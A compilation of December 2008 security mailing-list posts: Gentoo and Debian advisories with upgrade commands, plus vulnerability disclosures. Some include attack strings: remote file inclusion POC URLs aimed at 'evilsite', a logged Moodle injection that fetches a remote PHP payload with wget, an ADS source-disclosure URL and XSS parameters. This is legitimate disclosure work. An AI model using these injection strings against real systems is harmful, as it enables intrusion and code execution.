[ GLSA 200812-13 ] OpenOffice.org: Multiple vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200812-13 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: OpenOffice.org: Multiple vulnerabilities Date: December 12, 2008 Bugs: #235824, #244995 ID: 200812-13 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Multiple vulnerabilities in OpenOffice.org might allow for user-assisted execution of arbitrary code or symlink attacks. Background == OpenOffice.org is an open source office productivity suite, including word processing, spreadsheet, presentation, drawing, data charting, formula editing, and file conversion facilities. Affected packages = --- Package/ Vulnerable /Unaffected --- 1 app-office/openoffice3.0.0 = 3.0.0 2 app-office/openoffice-bin3.0.0 = 3.0.0 --- 2 affected packages on all of their supported architectures. --- Description === Two heap-based buffer overflows when processing WMF files (CVE-2008-2237) and EMF files (CVE-2008-2238) were discovered. Dmitry E. Oboukhov also reported an insecure temporary file usage within the senddoc script (CVE-2008-4937). Impact == A remote attacker could entice a user to open a specially crafted document, resulting in the remote execution of arbitrary code. A local attacker could perform symlink attacks to overwrite arbitrary files on the system. Both cases happen with the privileges of the user running the application. Workaround == There is no known workaround at this time. Resolution == All OpenOffice.org users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =app-office/openoffice-3.0.0 All OpenOffice.org binary users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =app-office/openoffice-bin-3.0.0 References == [ 1 ] CVE-2008-2237 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2237 [ 2 ] CVE-2008-2238 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2238 [ 3 ] CVE-2008-4937 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4937 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200812-13.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: OpenPGP digital signature
[ GLSA 200812-14 ] aview: Insecure temporary file usage
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200812-14 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: aview: Insecure temporary file usage Date: December 14, 2008 Bugs: #235808 ID: 200812-14 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis An insecure temporary file usage has been reported in aview, leading to symlink attacks. Background == aview is an ASCII image viewer and animation player. Affected packages = --- Package /Vulnerable/ Unaffected --- 1 media-gfx/aview 1.3.0_rc1-r1= 1.3.0_rc1-r1 Description === Dmitry E. Oboukhov reported that aview uses the /tmp/aview$$.pgm file in an insecure manner when processing files. Impact == A local attacker could perform symlink attacks to overwrite arbitrary files on the system with the privileges of the user running the application. Workaround == There is no known workaround at this time. Resolution == All aview users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =media-gfx/aview-1.3.0_rc1-r1 References == [ 1 ] CVE-2008-4935 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4935 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200812-14.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: OpenPGP digital signature
[SECURITY] [DSA 1686-1] New no-ip packages fix arbitrary code execution
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1686-1 secur...@debian.org http://www.debian.org/security/ Moritz Muehlenhoff December 14, 2008 http://www.debian.org/security/faq - Package: no-ip Vulnerability : buffer overflow Problem type : remote Debian-specific: no CVE Id(s) : CVE-2008-5297 Debian Bug : 506179 A buffer overflow has been discovered in the HTTP parser of the No-IP.com Dynamic DNS update client, which may result in the execution of arbitrary code. For the stable distribution (etch), this problem has been fixed in version 2.1.1-4+etch1. For the upcoming stable distribution (lenny) and the unstable distribution (sid), this problem has been fixed in version 2.1.7-11. We recommend that you upgrade your no-ip package. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - --- Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/n/no-ip/no-ip_2.1.1-4+etch1.diff.gz Size/MD5 checksum: 5099 991539fbaabc7808f1e6540e6d2a7d37 http://security.debian.org/pool/updates/main/n/no-ip/no-ip_2.1.1.orig.tar.gz Size/MD5 checksum:70553 a743fcd40699596d25347083eca86d52 http://security.debian.org/pool/updates/main/n/no-ip/no-ip_2.1.1-4+etch1.dsc Size/MD5 checksum: 573 a46cc0befc6409b256e76abceec2bba8 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/n/no-ip/no-ip_2.1.1-4+etch1_alpha.deb Size/MD5 checksum:25552 72ada61d338c9ca7ccf22de55168de1b amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/n/no-ip/no-ip_2.1.1-4+etch1_amd64.deb Size/MD5 checksum:22740 eea473fb4410d7b7953150139378b56c arm architecture (ARM) http://security.debian.org/pool/updates/main/n/no-ip/no-ip_2.1.1-4+etch1_arm.deb Size/MD5 checksum:21486 eb86554f2e2b20c382810bcfce21ac96 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/n/no-ip/no-ip_2.1.1-4+etch1_hppa.deb Size/MD5 checksum:23778 7212e0f6ef1b749de5531ff279fe63d1 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/n/no-ip/no-ip_2.1.1-4+etch1_i386.deb Size/MD5 checksum:20838 44598c7737861f61e7c6f012c65228f7 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/n/no-ip/no-ip_2.1.1-4+etch1_ia64.deb Size/MD5 checksum:30888 ba8e62cc6fe5bf70631710b699adb9da mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/n/no-ip/no-ip_2.1.1-4+etch1_mips.deb Size/MD5 checksum:23936 f3d9215b718a083354e9b9426577aafb mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/n/no-ip/no-ip_2.1.1-4+etch1_mipsel.deb Size/MD5 checksum:23854 69f6d783ff8345c565910877e2db4909 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/n/no-ip/no-ip_2.1.1-4+etch1_powerpc.deb Size/MD5 checksum:22514 550fe870f5d0cb85e2ab96c510d70127 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/n/no-ip/no-ip_2.1.1-4+etch1_s390.deb Size/MD5 checksum:22842 37f9132b2f6aae1a828405ae701a325c sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/n/no-ip/no-ip_2.1.1-4+etch1_sparc.deb Size/MD5 checksum:21020 191248685382bb6051853bba9081f012 These files will probably be moved into the stable distribution on its next update. - - For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-annou...@lists.debian.org Package info: `apt-cache show pkg' and http://packages.debian.org/pkg -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iEYEARECAAYFAklFavwACgkQXm3vHE4uylr6PACfecCxr6ytpCw+L6lwdkRCO1E+ +osAoMrr6OmEO0SRfP5ViXSr4hglrye5 =H5rj -END PGP SIGNATURE-
[ GLSA 200812-15 ] POV-Ray: User-assisted execution of arbitrary code
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200812-15 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: POV-Ray: User-assisted execution of arbitrary code Date: December 14, 2008 Bugs: #153538 ID: 200812-15 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis POV-Ray includes a version of libpng that might allow for the execution of arbitrary code when reading a specially crafted PNG file Background == POV-Ray is a well known open-source ray tracer. Affected packages = --- Package / Vulnerable / Unaffected --- 1 media-gfx/povray 3.6.1-r4 = 3.6.1-r4 Description === POV-Ray uses a statically linked copy of libpng to view and output PNG files. The version shipped with POV-Ray is vulnerable to CVE-2008-3964, CVE-2008-1382, CVE-2006-3334, CVE-2006-0481, CVE-2004-0768. A bug in POV-Ray's build system caused it to load the old version when your installed copy of libpng was =media-libs/libpng-1.2.10. Impact == An attacker could entice a user to load a specially crafted PNG file as a texture, resulting in the execution of arbitrary code with the permissions of the user running the application. Workaround == There is no known workaround at this time. Resolution == All POV-Ray users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =media-gfx/povray-3.6.1-r4 References == [ 1 ] CVE-2004-0768 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0768 [ 2 ] CVE-2006-0481 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0481 [ 3 ] CVE-2006-3334 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3334 [ 4 ] CVE-2008-1382 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1382 [ 5 ] CVE-2008-3964 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3964 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200812-15.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: OpenPGP digital signature
[ GLSA 200812-16 ] Dovecot: Multiple vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200812-16 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Dovecot: Multiple vulnerabilities Date: December 14, 2008 Bugs: #240409, #244962, #245316 ID: 200812-16 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Multiple vulnerabilities were found in the Dovecot mailserver. Background == Dovecot is an IMAP and POP3 server written with security primarily in mind. Affected packages = --- Package / Vulnerable / Unaffected --- 1 net-mail/dovecot 1.1.7-r1 = 1.1.7-r1 Description === Several vulnerabilities were found in Dovecot: * The k right in the acl_plugin does not work as expected (CVE-2008-4577, CVE-2008-4578) * The dovecot.conf is world-readable, providing improper protection for the ssl_key_password setting (CVE-2008-4870) * A permanent Denial of Service with broken mail headers is possible (CVE-2008-4907) Impact == These vulnerabilities might allow a remote attacker to cause a Denial of Service, to circumvent security restrictions or allow local attackers to disclose the passphrase of the SSL private key. Workaround == There is no known workaround at this time. Resolution == All Dovecot users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =net-mail/dovecot-1.1.7-r1 Users should be aware that dovecot.conf will still be world-readable after the update. If employing ssl_key_password, it should not be used in dovecot.conf but in a separate file which should be included with include_try. References == [ 1 ] CVE-2008-4577 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4577 [ 2 ] CVE-2008-4578 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4578 [ 3 ] CVE-2008-4870 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4870 [ 4 ] CVE-2008-4907 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4907 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200812-16.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: OpenPGP digital signature
CFAGCMS Remote File Inclusion
## www.BugReport.ir #
#
# AmnPardaz Security Research Team
#
# Title: CFAGCMS Remote File Inclusion
# Vendor: http://sourceforge.net/projects/cfagcms/
# Bug: Remote File Inclusion
# Vulnerable Version: 1
# Exploitation: Remote with browser
# Fix: N/A
# Original Advisory: http://www.bugreport.ir/index_58.htm
###
- Description:
CFAGCMS is a gaming cms for gaming website like GameSpot, GameSpy and
others. It's using php and mysql.
- Vulnerability:
+-- File Inclusion
When register_globals is enabled, Its possible to include arbitrary
files from local or remote resources.
- Code Snippet:
themes/default/index.php #line:14-17
div id=twocols class=clearfix
div id=maincol maincol?php include($main);?/div
div id=rightcol right col?php include($right);?/div
/div
- Exploits/POCs:
POC: http://[URL]/cfagcms/themes/default/index.php?main=http://evilsite
POC: http://[URL]/cfagcms/themes/default/index.php?right=http://evilsite
- Credit :
AmnPardaz Security Research Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
www.BugReport.ir
www.AmnPardaz.com
[TKADV2008-014] MPlayer TwinVQ Processing Stack Buffer Overflow Vulnerability
Please find attached a detailed advisory of the vulnerability.
Alternatively, the advisory can also be found at:
http://www.trapkit.de/advisories/TKADV2008-014.txt
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Advisory: MPlayer TwinVQ Processing Stack Buffer Overflow
Vulnerability
Advisory ID:TKADV2008-014
Revision: 1.0
Release Date: 2008/12/14
Last Modified: 2008/12/14
Date Reported: 2008/12/07
Author: Tobias Klein (tk at trapkit.de)
Affected Software: MPlayer 1.0rc2 r28150 and
MPlayer SVN trunk r28149
Remotely Exploitable: Yes
Locally Exploitable:No
Vendor URL: http://www.mplayerhq.hu
Vendor Status: Vendor has released an updated version
Patch development time: 8 days
==
Vulnerability Details:
==
MPlayer contains a stack buffer overflow vulnerability while parsing
malformed TwinVQ media files. The vulnerability may be exploited by a
(remote) attacker to execute arbitrary code in the context of MPlayer.
==
Technical Details:
==
Source code file: libmpdemux\demux_vqf.c
[...]
24 static demuxer_t* demux_open_vqf(demuxer_t* demuxer) {
...
49 char chunk_id[4];
50 unsigned chunk_size;
51 [1] hi-size=chunk_size=stream_read_dword(s); /* include itself */
52 stream_read(s,chunk_id,4);
53 if(*((uint32_t *)chunk_id[0])==mmioFOURCC('C','O','M','M'))
54 {
55 [2] char buf[chunk_size-8];
56 unsigned i,subchunk_size;
57 [3] if(stream_read(s,buf,chunk_size-8)!=chunk_size-8) return NULL;
...
86 i+=subchunk_size+4;
87 while(ichunk_size-8)
88 {
89 unsigned slen,sid;
90 [4] char sdata[chunk_size];
91 sid=*((uint32_t *)buf[i]); i+=4;
92 [5] slen=be2me_32(*((uint32_t *)buf[i])); i+=4;
93 if(sid==mmioFOURCC('D','S','I','Z'))
94 {
95hi-Dsiz=be2me_32(*((uint32_t *)buf[i]));
96continue; /* describes the same info as size of DATA chunk */
97 }
98 [6] memcpy(sdata,buf[i],slen); sdata[slen]=0; i+=slen;
[...]
[1] The unsigned int variable chunk_size is filled with a user controlled
value from the media file.
[2] The value of chunk_size is used to calculate the length of the stack
buffer buf.
[3] buf is filled with user controlled data from the media file.
[4] The value of chunk_size is again used as a length specifier for
another stack buffer called sdata.
[5] The unsigned int variable slen is filled with a user controlled value
from the media file.
[6] This memcpy() function copies slen bytes of user controlled data from
buf into the stack buffer sdata. As slen, the source data as well
as the size of the destination buffer sdata are user controlled this
leads to an exploitable stack buffer overflow vulnerability.
=
Solution:
=
Upgrade to MPlayer 1.0rc2 = r28150 (see [1]) or MPlayer SVN trunk
= r28149 (see [2]).
History:
2008/12/07 - MPlayer maintainers notified (no response)
2008/12/13 - MPlayer maintainers notified a 2nd time
2008/12/13 - Patch developed by MPlayer maintainers
2008/12/14 - Public disclosure of vulnerability details by MPlayer
maintainers
2008/12/14 - Release date of this security advisory
Credits:
Vulnerability found and advisory written by Tobias Klein.
===
References:
===
[1] http://svn.mplayerhq.hu/mplayer?view=revrevision=28150
[2] http://svn.mplayerhq.hu/mplayer?view=revrevision=28149
[3] http://www.trapkit.de/advisories/TKADV2008-014.txt
Changes:
Revision 0.1 - Initial draft release to the vendor
Revision 1.0 - Public release
===
Disclaimer:
===
The information within this advisory may change without notice. Use
of this information constitutes acceptance for use in an AS IS
condition. There are no warranties, implied or express, with regard
to this information. In no event shall the author be liable for any
direct or indirect damages whatsoever arising out of or in connection
with the use or spread of this information. Any use of this
information is at the user's own risk.
==
PGP Signature Key:
==
http://www.trapkit.de/advisories/tk-advisories-signature-key.asc
Copyright 2008 Tobias Klein. All rights reserved.
-BEGIN PGP SIGNATURE-
Version: GnuPG
iD8DBQFJRTPgkXxgcAIbhEERAozRAJ99w8+Fd/tpkrFK6iWULTNsrUFPCQCgscV3
bq82SPZiJ7lWooDSZUW7en4=
=6hrU
-END PGP SIGNATURE-
Re: Moodle 1.9.3 Remote Code Execution
Exploit in the wild: We saw this come across: 216.205.95.178 - - [12/Dec/2008:15:03:13 -0500] GET /filter/tex/texed.php?formdata=foopathname=foo\;wget -O perso.wanadoo.es/medline/z1.php;echo+\ HTTP/1.1 404 218 The host perso.wanadoo.es is still host the payload as of [15/Dec/2008:00:14:00 -0500]. Chris Lent Tel: +1.212.353.4350
Multiple XSS Vulnerabilities in World Recipe 2.11
Armorize Technologies Security Advisory (Armorize-ADV-2008-0001) Title: Multiple XSS Vulnerabilities in World Recipe 2.11 Date: 2008/12/15 Status: Full Class: Input Validation Error Bugtraq ID: N/A Category: Cross Site Scripting Language: ASP.NET (C#) Description Armorize-ADV-2008-0001 discloses multiple cross-site scripting vulnerabilities that are found in World Recipe, which is an ASP.NET 2.0 C# application and SQL Database with stored procedure to contain and display recipes in a wide variety of categories. Discussion World Recipe is vulnerable to cross-site scripting attack because it fails to properly sanitize user-supplied input. Exploiting this vulnerability may allow an attacker to make targeted users executing arbitrary scripts in the context of the affected website. As a result, the attacker may be able to steal authentication credentials such as cookie, to alter the integrity of the visited page, and to launch other attacks such as phishing and force redirect. Exploit: http://www.example.com/[PATH]/emailrecipe.aspx GET variables n is vulnerable. http://www.example.com/[PATH]/recipedetail.aspx GET variable id is vulnerable. http://www.example.com/[PATH]/validatefieldlength.aspx GET variable catid is vulnerable. Vulnerable Vendor: Ex-designz (http://www.ex-designz.net/) Software: World Recipe Version:2.11 URL:http://www.ex-designz.net/softwaredetail.asp?fid=1884 Suggested Solution: 1. Constrain all input. 2. Reject all prohibited input. 3. Escape every input. Disclosure Timeline: 2008/12/12 Vendor notification 2008/12/15 Full disclosure at SecurityFocus mailing list Credit: Armorize Security Taskforce (ASF) at Armorize Technologies, Inc. (security dot armorize dot com) Armorize Technologies is a software security company focusing on Web application security. The award-winning automated source code analysis solution, CodeSecure, provides the simplest and most accurate solution for identifying the root causes of vulnerabilities directly in the Web application source code and for enforcing Secure Software Development Lifecycle (Secure SDLC) effectively and efficiently. Find out more at Armorize Technologies website, http://www.armorize.com.
phpList vulnerability
phpList is a feature rich newsletter application written in PHP. phpList has a local file include vulnerability. The vulnerability has already been exploited. affected versions: any version up to including 2.10.7 fixed in version 2.10.8 Related links: www.phplist.com phpList homepage http://sourceforge.net/projects/phplist Sourceforge Project page.
Re: Moodle 1.9.3 Remote Code Execution
2008/12/15 l...@cooper.edu: Exploit in the wild: We saw this come across: 216.205.95.178 - - [12/Dec/2008:15:03:13 -0500] GET /filter/tex/texed.php?formdata=foopathname=foo\;wget -O perso.wanadoo.es/medline/z1.php;echo+\ HTTP/1.1 404 218 The host perso.wanadoo.es is still host the payload as of [15/Dec/2008:00:14:00 -0500]. Looks like the usual sort of script to do things like execute commands, upload/touch/delete files and eval() PHP. Only unusual in that it's relatively clean and small. I thought it was obfuscated at first glance, but it's just compressed - only takes a couple of minutes to turn it into readable source. (Just need to change ;eval($t) ? at the end to ;echo($t) ? and run it from the CLI. Then add line breaks and formatting as required.) cheers, Jamie -- Jamie Riden / jam...@europe.com / ja...@honeynet.org.uk http://www.ukhoneynet.org/members/jamie/
Re: Re: Multiple XSRF in DD-WRT (Remote Root Command Execution)
That is why it is called a remote command execution via a CSRF vulnerability. Your code should be AT LEAST checking referrers (weak and obscure but helpful) or implementing many of the other protections that are available. See http://www.owasp.org/index.php/Cross-Site_Request_Forgery for more details. Good info @ http://www.cgisecurity.com/articles/csrf-faq.shtml as well: The most popular suggestion to preventing CSRF involves appending challenge tokens to each request. It is important to state that this challenge token MUST be associated with the user session, otherwise an attacker may be able to fetch a valid token on their own and utilize it in an attack. In addition to being tied to the user session it is important to limit the time peroid to which a token is valid. This method is documented in multiple documents however as pointed out in mailing list postings an attacker can utilize an existing browser vulnerability or XSS flaw to grab this session token. The fact is, as long as one of these situations is available, the exploit can be auto-pwn: 1) The tab is open somewhere on the browser. 2) The session is still active in the browser. 3) The browser used has the credentials saved (No prompts /w Safari). 4) Nearly any situation where the target visits the page (But if not 1, 2, or 3 a prompt will usually pop up asking for credentials
TmaxSoft JEUS Alternate Data Streams Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Title: TmaxSoft JEUS Alternate Data Streams Vulnerability Author: Simon Ryeo(bar4mi (at) gmail) Severity: High Impact: Remote File Disclosure Vulnerable Version: JEUS 5: Fix#26 on NTFS References: - http://www.microsoft.com/technet/security/bulletin/ms98-003.mspx - http://www.tmaxsoft.com - http://www.tmax.co.kr/tmaxsoft/index.screen History: - 10.22.2008: Initiate notify - 10.23.2008: The vendor responded - 11.21.2008: The vendor replied detail information. - 12.12.2008: The vendor finished the preparation for patches and responses. Description: On NTFS TmaxSoft JEUS, which is an famous web application server, contained a vulnerability that allows an attacker to obtain web application source files. This was caused by ADSs(Alternate Data Streams; ::$DATA). JEUS couldn't handle ::$DATA. So it treated test.jsp::$DATA as an normal file when it requested. This is similar to the past MS Widnows IIS vulnerability(Bid 0149). Exploit: The attacker can obtain them easily using an URL request. http://www.target.com/foo/bar.jsp::$DATA Solution: The vendor released solutions for this problem. Method 1) Upgrade JEUS - JEUS 5: http://technet.tmax.co.kr/kr/download/platformList.do?groupCode=WASproduct Code=JeusversionCode=5.0.0.26.Pfc=downsc=down_productmid=binary - JEUS 4: a. Use to change WebtoB function b. Upgrade JEUS to version 6 (the service for version 4 will be out of service after Dec 2009) Method 2) Use to change WebtoB fuction - Change the message communication method from 'URI' to 'EXT' (This is valid whether you use the embed WebtoB to JEUS or the single WebtoB) Method 3) Install the patch (ex. jext.jar) - The patch file will be valid until Jan. 2009 (Target version: 3.3.7.15, 4.0, 4.1, 4.2 final, 5.x(each verison will be offered below Fix#26) Please refer to TmaxSoft Homepage for detail support palns. It will be valid until Mar. 2009. (http://www.tmaxsoft.com) -BEGIN PGP SIGNATURE- Version: 9.8.3.4028 wj8DBQFJQqOXzuoR/xLtCioRAn2DAKDpN2ckXu7xt6OvYUeWHLiEoPQOmwCg6csI KY69SPNXHg2rHlXJanIBQDw= =SW3P -END PGP SIGNATURE--
Fwd: TmaxSoft JEUS Alternate Data Streams Vulnerability
Dear bugtraq, Thanks for your concern. I saw BID 32804. It is one incorrect information. Tmax Soft JEUS 5 Fix#26 is not vulnerable. The vendor informs that users upgrade to this version(Fix #26). Please change this information. Sincerely, Simon -- Forwarded message -- From: Simon Ryeo bar...@gmail.com Date: 2008/12/13 Subject: TmaxSoft JEUS Alternate Data Streams Vulnerability To: bugtraq@securityfocus.com -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Title: TmaxSoft JEUS Alternate Data Streams Vulnerability Author: Simon Ryeo(bar4mi (at) gmail) Severity: High Impact: Remote File Disclosure Vulnerable Version: JEUS 5: Fix#26 on NTFS References: - http://www.microsoft.com/technet/security/bulletin/ms98-003.mspx - http://www.tmaxsoft.com - http://www.tmax.co.kr/tmaxsoft/index.screen History: - 10.22.2008: Initiate notify - 10.23.2008: The vendor responded - 11.21.2008: The vendor replied detail information. - 12.12.2008: The vendor finished the preparation for patches and responses. Description: On NTFS TmaxSoft JEUS, which is an famous web application server, contained a vulnerability that allows an attacker to obtain web application source files. This was caused by ADSs(Alternate Data Streams; ::$DATA). JEUS couldn't handle ::$DATA. So it treated test.jsp::$DATA as an normal file when it requested. This is similar to the past MS Widnows IIS vulnerability(Bid 0149). Exploit: The attacker can obtain them easily using an URL request. http://www.target.com/foo/bar.jsp::$DATA Solution: The vendor released solutions for this problem. Method 1) Upgrade JEUS - JEUS 5: http://technet.tmax.co.kr/kr/download/platformList.do?groupCode=WASproduct Code=JeusversionCode=5.0.0.26.Pfc=downsc=down_productmid=binary - JEUS 4: a. Use to change WebtoB function b. Upgrade JEUS to version 6 (the service for version 4 will be out of service after Dec 2009) Method 2) Use to change WebtoB fuction - Change the message communication method from 'URI' to 'EXT' (This is valid whether you use the embed WebtoB to JEUS or the single WebtoB) Method 3) Install the patch (ex. jext.jar) - The patch file will be valid until Jan. 2009 (Target version: 3.3.7.15, 4.0, 4.1, 4.2 final, 5.x(each verison will be offered below Fix#26) Please refer to TmaxSoft Homepage for detail support palns. It will be valid until Mar. 2009. (http://www.tmaxsoft.com) -BEGIN PGP SIGNATURE- Version: 9.8.3.4028 wj8DBQFJQqOXzuoR/xLtCioRAn2DAKDpN2ckXu7xt6OvYUeWHLiEoPQOmwCg6csI KY69SPNXHg2rHlXJanIBQDw= =SW3P -END PGP SIGNATURE--
[SECURITY] [DSA 1687-1] New Linux 2.6.18 packages fix several vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA-1687-1secur...@debian.org http://www.debian.org/security/ dann frazier Dec 15, 2008http://www.debian.org/security/faq - -- Package: linux-2.6 Vulnerability : denial of service/privilege escalation Problem type : local/remote Debian-specific: no CVE Id(s) : CVE-2008-3527 CVE-2008-3528 CVE-2008-4554 CVE-2008-4576 CVE-2008-4933 CVE-2008-4934 CVE-2008-5025 CVE-2008-5029 CVE-2008-5079 CVE_2008-5182 CVE-2008-5300 Several vulnerabilities have been discovered in the Linux kernel that may lead to a denial of service or privilege escalation. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2008-3527 Tavis Ormandy reported a local DoS and potential privilege escalation in the Virtual Dynamic Shared Objects (vDSO) implementation. CVE-2008-3528 Eugene Teo reported a local DoS issue in the ext2 and ext3 filesystems. Local users who have been granted the privileges necessary to mount a filesystem would be able to craft a corrupted filesystem that causes the kernel to output error messages in an infinite loop. CVE-2008-4554 Milos Szeredi reported that the usage of splice() on files opened with O_APPEND allows users to write to the file at arbitrary offsets, enabling a bypass of possible assumed semantics of the O_APPEND flag. CVE-2008-4576 Vlad Yasevich reported an issue in the SCTP subsystem that may allow remote users to cause a local DoS by triggering a kernel oops. CVE-2008-4933 Eric Sesterhenn reported a local DoS issue in the hfsplus filesystem. Local users who have been granted the privileges necessary to mount a filesystem would be able to craft a corrupted filesystem that causes the kernel to overrun a buffer, resulting in a system oops or memory corruption. CVE-2008-4934 Eric Sesterhenn reported a local DoS issue in the hfsplus filesystem. Local users who have been granted the privileges necessary to mount a filesystem would be able to craft a corrupted filesystem that results in a kernel oops due to an unchecked return value. CVE-2008-5025 Eric Sesterhenn reported a local DoS issue in the hfs filesystem. Local users who have been granted the privileges necessary to mount a filesystem would be able to craft a filesystem with a corrupted catalog name length, resulting in a system oops or memory corruption. CVE-2008-5029 Andrea Bittau reported a DoS issue in the unix socket subsystem that allows a local user to cause memory corruption, resulting in a kernel panic. CVE-2008-5079 Hugo Dias reported a DoS condition in the ATM subsystem that can be triggered by a local user by calling the svc_listen function twice on the same socket and reading /proc/net/atm/*vc. CVE_2008-5182 Al Viro reported race conditions in the inotify subsystem that may allow local users to acquire elevated privileges. CVE-2008-5300 Dann Frazier reported a DoS condition that allows local users to cause the out of memory handler to kill off privileged processes or trigger soft lockups due to a starvation issue in the unix socket subsystem. For the stable distribution (etch), this problem has been fixed in version 2.6.18.dfsg.1-23etch1. We recommend that you upgrade your linux-2.6, fai-kernels, and user-mode-linux packages. Note: Debian 'etch' includes linux kernel packages based upon both the 2.6.18 and 2.6.24 linux releases. All known security issues are carefully tracked against both packages and both packages will receive security updates until security support for Debian 'etch' concludes. However, given the high frequency at which low-severity security issues are discovered in the kernel and the resource requirements of doing an update, lower severity 2.6.18 and 2.6.24 updates will typically release in a staggered or leap-frog fashion. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database 